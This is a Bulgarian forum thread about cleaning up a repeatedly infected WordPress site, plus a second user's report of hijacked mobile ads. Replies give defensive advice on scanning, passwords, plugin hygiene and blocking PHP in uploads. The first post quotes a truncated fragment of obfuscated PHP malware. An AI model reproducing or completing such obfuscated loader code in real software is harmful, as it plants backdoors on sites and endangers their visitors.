Помощ за хакнат сайт - два пъти за седмица!

Kiril

Active Member
Здравейте!
От хостинга получих съобщение за зловреден код в някой файлове по сайта. Сайта не е спирал и нямаше видими проблеми. Изтрих го целия. Сложих нов WP и от стария взех само папка uploads и базата. След това сканираха сайта отново и всичко беше ОК, но 3 дни след това пак ми изпратиха съобщение за 10-тина заразени файлове! Във файловете има добавен много реда код. Ето част от него:

Код:
<?php $w43347e3 = 668;$GLOBALS['v5a47'] = Array();global $v5a47;$v5a47 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m5687ccb'] = "\x59\x2f\x6f\x4e\x9\x3a\x7c\x40\x25\x73\x6e\x79\x6c\x5e\x62\x32\x4a\x7d\x22\x28\x68\x3c\x39\x46\x2a\x34\x47\x3e\x43\x51\x37\x60\x3b\x58\x3d\x5c\x64\x71\x26\x41\x5d\x57\xa\x31\x6d\x55\x33\xd\x77\x78\x76\x27\x70\x5b\x2c\x44\x67\x74\x4d\x48\x65\x38\x21\x56\x3f\x50\x36\x49\x2e\x7a\x54\x75\x20\x5a\x69\x4b\x42\x7e\x23\x2b\x72\x4c\x29\x61\x45\x53\x6b\x7b\x52\x66\x30\x35\x6a\x63\x24\x5f\x2d\x4f";$v5a47[$v5a47['m5687ccb'][48].$v5a47['m5687ccb'][60].$v5a47['m5687ccb'][25].$v5a47['m5687cc...

Може ли да ме посъветвате, къде да търся дупката? Може ли да има нещо в базата?

Приемам и предложения за платена помощ!
 
Последно редактирано:

alexkuzmov

Active Member
Трудна работа да се разбере от къде е.
Пробвай това:

1. Спри тези функции: https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions/31869925
2. Провери си темата и plug-in-те дали в google пише нещо за тях, дали са хаквани.
3. Оправи си правата на файловете така че да не може да се редактират.
Примерно само root user да може даги редактира.

След като минеш през тези, преинсталирай пак wordpress-a и виж дали ще се оправи проблема, успех!
 

Станимир И

Active Member
Здравейте, мога да ти дам няколко съвета на сляпо, защото не знам какъв е случая:

1.Сменяш всички пароли на хостинг и сайта
2.Инстлираш Wordfence Security и направи сканиране на файловете
3.BBQ: Block Bad Queries
4.Hide My WP
5.Не ползвай Nulled модули, плащай си за модули

Може още доста неща да се направят, просто на сляпо това.

Поздрави,
Станимир И
 

s1yf0x

Well-Known Member
Четейки написаното предполагам, че ползваш споделен хостинг, а не услуга, която можеш да менажираш сам. В такъв случай не ти, а хостинга трябва да направят проверка отновно:

1. ctime timestamp на списъка със заразените файлове
2. хистограма на логовете (http, ftp, cpanel access) за посочения в т,1 timestamp
3. 99.99 % от случаите се вижда от къде е са дошли пуканките. Може и да са от друг сайт в акаунта ти, чийто файлове и директории са собственост на същото потребителско име.

Като цяло, местенето на uploads не е добра идея, защото много често при RFI атака , php скриптвоете използвани за достъп до останалите php файлоове на WP се качват точно там. Винаги спирам изпълнението на .php с .htaccess или съответната конфигурация , ако се ползва рачличен уеб сървър от Apache, в директория uploads. Това, което правят допълнителните плъгини BBQ, Wordfence Security и Hide My WP можеш да го направиш и през htaccess без да се минава през php и да се чудиш защо сайта започва да се зарежда по-бавно, или започва да разходва прекалено много системни ресурси и бълва грешки 5хх при изчерпване на лимитите.
 

Kiril

Active Member
Благодаря на всички!
Днес ще опитам с нова преинсталация, но няма как да не копирам старата папка uploads. Много е голяма и ако трябва да качвам файловете един по един... Има ли начин да я сканирам?

Нямам нулнати неща. Темата ми е Beaver Builder Pro и си я плащам всяка година. Използвам я на още 20-тина сайта и с тях няма проблем.

Списъка с плъгини не е голям:
  • Advanced Order Export For WooCommerce
  • BackWPup
  • Beaver Builder Plugin (Pro Version)
  • Cookie Notice
  • Email download link /този малко ме съмнява/
  • Events Manager
  • Loginizer
  • Product Sales Report for WooCommerce
  • Quick Page/Post Redirect Plugin
  • WooCommerce
  • WooCommerce Authorize.Net Gateway
  • WooCommerce USPS Shipping
  • Wufoo Shortcode Plugin
  • Yoast SEO
Преди първия хак имах плъгин File Manager, който дава достъп до всички файловете на сървъра директно от контролния панел, но го махнах. Освен да е останало нещо от него и при второто хакване да се възползвали?

Домейна ми е през CloudFlare и има Firewall Rules /прикачен/, но явно не помагат!
 

Прикачени файлове

  • Screenshot 2020-09-09 at 8.47.08.png
    Screenshot 2020-09-09 at 8.47.08.png
    215.7 KB · Преглеждания: 11

Vladislaw

Active Member
И мен ми 'хакнаха' 6-7 сайта в който имаше 100-тина файла.
Сваляй Wordfence Security и го настрой да сканира и извън WP директорията. Триеш, сменяш всички пароли, обновяваш плъгини, теми и тн.
 

coolice

Owner
File Manager беше хакнат миналата семдица на (4.09) + атака към 1 милион сайта който го ползва WordFence - вероятно е много по голяма - вероятно имаш скрити шелл скрикптс в uploads или имаш / качваш още нещо с дупки
 

Прикачени файлове

  • Screenshot from 2020-09-09 10-42-32.png
    Screenshot from 2020-09-09 10-42-32.png
    23.7 KB · Преглеждания: 29

Kiril

Active Member
@s1yf0x се оказа прав! Сканирах с WordFence и намери 3-4 .php файла и един май беше .ico със странни имена в папките с картинките в uploads. Изтрих ги.

Явно проблема наистина е дошъл от File Manager, както писа @coolice.
Благодаря ви момчета!


Сканирах отново и изглежда чисто за сега.
:)
 

alexkuzmov

Active Member
@s1yf0x се оказа прав! Сканирах с WordFence и намери 3-4 .php файла и един май беше .ico със странни имена в папките с картинките в uploads. Изтрих ги.

Явно проблема наистина е дошъл от File Manager, както писа @coolice.
Благодаря ви момчета!


Сканирах отново и изглежда чисто за сега.
:)
Трябва някаква тема да пуснем със пин като важна, където да има лист от стъпки, през които да мине човек ако му е хакнат wordpress-a
 

bgmilen

New Member
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
 

alexkuzmov

Active Member
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
Кой е сайта?
 

s1yf0x

Well-Known Member
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
Гледайки на карти и други гадателски техники "виждам" 2 възможни варианта:

- ужилен JS
- инжектиран скрипт в базата данни

за това и скенерите не го засичат, защото не може да се пресъздаде заявка от мобилен браузър с вкл. JS
 

bgmilen

New Member
Гледайки на карти и други гадателски техники "виждам" 2 възможни варианта:

- ужилен JS
- инжектиран скрипт в базата данни

за това и скенерите не го засичат, защото не може да се пресъздаде заявка от мобилен браузър с вкл. JSРешението само едно ли е изтриване на всичко и създаване на сайта от начало?
 

Sky

Well-Known Member
Калдата доскоро имаха реклами с голи каки в мобилната също :D
 

s1yf0x

Well-Known Member
Решението да изтриеш всичко и да почнеш от начало е оправдано само тогава, когато почиствавето излиза повече като цена отколкото самия сайт като актив.
 

Горе